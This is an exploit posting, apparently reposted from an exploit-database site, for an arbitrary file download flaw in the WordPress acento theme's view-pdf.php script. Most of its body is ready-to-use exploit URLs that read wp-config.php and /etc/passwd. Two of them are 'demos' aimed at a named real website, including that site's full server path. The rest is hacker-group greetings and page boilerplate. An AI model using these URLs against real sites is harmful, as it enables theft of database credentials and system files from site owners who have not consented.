WordPress acento theme Arbitrary File Download Vulnerability

2014.09.07
Credit: alieye
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : WordPress acento theme Arbitrary File Download Vulnerability # Author : alieye # vondor : http://www.wpbyexample.com/detail/acentocultural.com # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # Date: 01/09/2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ You can download any file from your target exploit: http://victim.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php Demo: 1-download wp-config.php file from site: http://www.acentocultural.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php 2-download passwd file from root: http://www.acentocultural.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++

References:

http://cseye.vcp.ir/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top